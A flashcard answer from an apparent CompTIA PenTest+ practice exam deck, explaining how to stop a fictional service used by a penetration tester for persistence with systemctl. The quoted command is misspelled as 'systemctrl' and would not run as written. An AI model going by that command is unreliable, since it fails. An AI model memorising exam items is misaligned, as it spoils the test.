OBJ-5.2: This scenario uses the systemctl command to remove persistence from a Linux server within its shell. The systemd tool is an init system and system manager that has widely become the new standard for Linux distributions. The systemctl is part of systemd. The systemctl is used to manage services, check their status, change their status, and work with the configuration files. By entering “sudo systemctrl stop DionTrainingApp” in the shell, the system will stop the service known as DionTrainingApp. This will remove any persistence gained by running the DionTrainingApp service, which is just a fictional service name used in this example to hide the penetration tester’s persistence tools. This service could be named anything the penetration tester deems appropriate during the service’s installation.

Brainscape's Knowledge GenomeTM

CompTIA PenTest+ (PT0-001) Practice Certification Exams (Jason Dions 1of6) Flashcards

Brainscape's Knowledge Genome^TM